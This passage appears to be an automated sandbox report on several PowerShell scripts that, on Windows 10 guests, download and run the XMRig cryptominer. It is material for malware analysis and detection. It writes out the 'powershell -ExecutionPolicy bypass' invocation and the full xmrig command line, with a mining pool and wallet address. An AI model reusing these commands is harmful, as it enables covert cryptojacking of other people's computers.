US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/2916-0-0x00007FF931353000-0x00007FF931354000-memory.dmp

memory/2916-5-0x00000267EC670000-0x00000267EC692000-memory.dmp

memory/2916-8-0x00000267EC880000-0x00000267EC8F6000-memory.dmp

memory/2916-9-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gqx5xjj.mjn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2916-24-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-25-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-48-0x00000267EC820000-0x00000267EC832000-memory.dmp

memory/2916-61-0x00000267EC660000-0x00000267EC66A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2848-90-0x000001A653F50000-0x000001A653F70000-memory.dmp

memory/2848-91-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2916-92-0x00007FF931353000-0x00007FF931354000-memory.dmp

memory/2848-93-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2916-94-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-95-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2848-96-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-97-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-98-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-99-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-100-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-101-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-102-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-103-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-104-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-105-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-106-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-107-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-108-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-109-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-110-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-111-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-112-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-113-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-114-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-115-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-116-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-117-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-118-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-119-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-120-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-121-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-122-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-123-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-124-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-125-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-126-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-127-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-128-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-129-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-130-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-131-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-132-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-133-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-134-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-135-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-136-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-137-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-138-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-139-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-140-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-141-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-142-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-143-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-144-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-145-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-146-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-147-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-148-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-149-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-150-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-151-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-152-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-153-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-154-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-155-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

memory/2848-156-0x00007FF64E520000-0x00007FF64F153000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:42

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 247.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 98.251.17.2.in-addr.arpa udp

Files

memory/4324-2-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp

memory/4324-5-0x00000206EC150000-0x00000206EC172000-memory.dmp

memory/4324-6-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-9-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-10-0x00000206EC300000-0x00000206EC376000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bvxv4s3q.ddm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4324-25-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-48-0x00000206EC480000-0x00000206EC492000-memory.dmp

memory/4324-61-0x00000206EC2F0000-0x00000206EC2FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1504-90-0x000001D579A70000-0x000001D579A90000-memory.dmp

memory/4324-91-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp

memory/4324-92-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/1504-93-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/4324-94-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/1504-95-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-96-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-97-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-98-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-99-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-100-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-101-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-102-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-103-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-104-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-105-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-106-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-107-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-108-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-109-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-110-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-111-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-112-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-113-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-114-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-115-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-116-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-117-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-118-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-119-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-120-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-121-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-122-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-123-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-124-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-125-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-126-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-127-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-128-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-129-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-130-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-131-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-132-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-133-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-134-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-135-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-136-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-137-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-138-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-139-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-140-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-141-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-142-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-143-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-144-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-145-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-146-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-147-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-148-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-149-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-150-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-151-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-152-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-153-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-154-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-155-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

memory/1504-156-0x00007FF695780000-0x00007FF6963B3000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win7-20240215-en

Max time kernel

1565s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/2960-4-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp

memory/2960-5-0x000000001B570000-0x000000001B852000-memory.dmp

memory/2960-7-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

memory/2960-9-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

memory/2960-8-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

memory/2960-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/2960-10-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

memory/2960-11-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:17

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1564s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

memory/1440-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp

memory/1440-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

memory/1440-6-0x0000000002220000-0x0000000002228000-memory.dmp

memory/1440-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/1440-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/1440-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/1440-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/1440-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/1440-12-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:18

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

memory/1236-0-0x00007FFAF4F43000-0x00007FFAF4F45000-memory.dmp

memory/1236-1-0x000001264C5F0000-0x000001264C612000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cx5kxpd5.il4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1236-11-0x00007FFAF4F40000-0x00007FFAF5A01000-memory.dmp

memory/1236-12-0x00007FFAF4F40000-0x00007FFAF5A01000-memory.dmp

memory/1236-14-0x00007FFAF4F40000-0x00007FFAF5A01000-memory.dmp

memory/1236-15-0x000001264CB00000-0x000001264CB12000-memory.dmp

memory/1236-16-0x000001264C650000-0x000001264C65A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1980-47-0x000002B44B780000-0x000002B44B7A0000-memory.dmp

memory/1980-48-0x000002B44B7C0000-0x000002B44B7E0000-memory.dmp

memory/1980-49-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-52-0x000002B44B800000-0x000002B44B820000-memory.dmp

memory/1980-51-0x000002B44B7E0000-0x000002B44B800000-memory.dmp

memory/1980-50-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1236-53-0x00007FFAF4F43000-0x00007FFAF4F45000-memory.dmp

memory/1236-54-0x00007FFAF4F40000-0x00007FFAF5A01000-memory.dmp

memory/1980-55-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1236-56-0x00007FFAF4F40000-0x00007FFAF5A01000-memory.dmp

memory/1980-57-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-59-0x000002B44B800000-0x000002B44B820000-memory.dmp

memory/1980-58-0x000002B44B7E0000-0x000002B44B800000-memory.dmp

memory/1980-60-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-61-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-62-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-63-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-64-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-65-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-66-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-67-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-68-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

